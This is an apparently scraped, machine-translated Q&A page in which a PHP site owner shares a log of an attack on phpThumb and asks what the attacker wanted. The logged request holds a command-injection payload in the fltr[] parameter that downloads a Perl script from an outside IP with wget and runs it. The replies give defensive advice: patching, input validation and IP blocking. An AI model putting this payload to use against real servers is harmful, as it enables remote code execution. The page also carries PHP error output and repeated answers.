Warning: file_get_contents(/data/phpspider/zhask/data//catemap/1/php/279.json): failed to open stream: No such file or directory in /data/phpspider/zhask/libs/function.php on line 167

Warning: Invalid argument supplied for foreach() in /data/phpspider/zhask/libs/tag.function.php on line 1116

Notice: Undefined index: in /data/phpspider/zhask/libs/function.php on line 180

Warning: array_chunk() expects parameter 1 to be array, null given in /data/phpspider/zhask/libs/function.php on line 181

Warning: file_get_contents(/data/phpspider/zhask/data//catemap/2/linux/27.json): failed to open stream: No such file or directory in /data/phpspider/zhask/libs/function.php on line 167

Warning: Invalid argument supplied for foreach() in /data/phpspider/zhask/libs/tag.function.php on line 1116

Notice: Undefined index: in /data/phpspider/zhask/libs/function.php on line 180

Warning: array_chunk() expects parameter 1 to be array, null given in /data/phpspider/zhask/libs/function.php on line 181
Php 我编写了一个错误日志脚本,记录所有输入和其他内容_Php_Linux_Security_Ubuntu - Fatal编程技术网

Php 我编写了一个错误日志脚本,记录所有输入和其他内容

Php 我编写了一个错误日志脚本,记录所有输入和其他内容,php,linux,security,ubuntu,Php,Linux,Security,Ubuntu,我相信攻击者会出错。。他们想做什么?如何阻止他们?以下是日志: Monday 26th of December 2011 12:10:18 PM src=file.jpg&fltr[]=blur| 9%20-quality%20%2075%20interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;per

我相信攻击者会出错。。他们想做什么?如何阻止他们?以下是日志:

Monday 26th of December 2011 12:10:18 PM
src=file.jpg&fltr[]=blur|
9%20-quality%20%2075%20interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 
91.121.133.22 
| 39757 
| /var/www/class.php 
| /class/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9
[src=file.jpg]-[fltr=Array]-[phpThumbDebug=9]-


我已将这些区域划分为新线。大部分是输入,然后是服务器端口、ip地址和访问的脚本。看起来他们肯定是想利用漏洞来访问命令行。但这不是他们认为的脚本。

Web服务器总是受到攻击。任何给定的攻击都是试图挑出特定的程序。 如果您编写的软件很好,并且验证了所有输入,那么您的系统应该能够容忍这样的垃圾,并礼貌地忽略它。 这不像DOS攻击,如果它一天只发生3次。
如果你想发疯,你可以写一个脚本来扫描日志,如果你看到一个已知的攻击模式,运行一个脚本来阻止ip在N次点击后进入你的Web服务器。

Web服务器总是受到攻击。任何给定的攻击都是试图挑出特定的程序。 如果您编写的软件很好,并且验证了所有输入,那么您的系统应该能够容忍这样的垃圾,并礼貌地忽略它。 这不像DOS攻击,如果它一天只发生3次。
如果你想发疯,你可以编写一个脚本来扫描日志,如果你看到已知的攻击模式,运行一个脚本来阻止ip在N次点击后进入你的Web服务器。

看来phpThumb的fltr[]参数中存在命令注入漏洞


phpThumb的fltr[]参数中似乎存在命令注入漏洞


如果所有攻击都来自同一IP地址,则您可以使用iptables阻止该IP访问您的服务器。您可以通过编写脚本让它临时或永久地执行此操作。 此解决方案假定您对托管的服务器具有root/sudo访问权限。 您还可以探索snort,它对于已知(和常见)利用有效负载和字符串非常有效


最后,在防止常见的基于web的攻击方面,没有什么比可靠的输入验证更有效了

如果所有攻击都来自同一IP地址,那么您可以使用iptables阻止该IP访问您的服务器。您可以通过编写脚本让它临时或永久地执行此操作。 此解决方案假定您对托管的服务器具有root/sudo访问权限。 您还可以探索snort,它对于已知(和常见)利用有效负载和字符串非常有效


最后,在防止常见的基于web的攻击方面,没有什么比可靠的输入验证更有效了

你可以尝试阻止他们的IP等,但最好的防御方法就是更新所有内容并使用安全软件。正如斯图所说,打开你的访问日志,会有成吨成吨的攻击、怪异的用户代理、人们寻找漏洞。这个问题似乎与主题无关,因为它与编程无关,而是关于安全。你可以尝试或。你可以尝试阻止他们的IP等,但最好的防御措施就是更新所有内容并使用安全软件。正如斯图所说,打开你的访问日志,会有成吨成吨的攻击、怪异的用户代理、钓鱼人利用漏洞。这个问题似乎与主题无关,因为它与编程无关,而是关于安全。你可以尝试或。保持系统更新,可能他们攻击的任何程序都已修复。保持系统更新,可能他们攻击的任何程序都已修复。这很好,因为我的服务器上没有任何公共软件。这很好,因为我的服务器上没有任何公共软件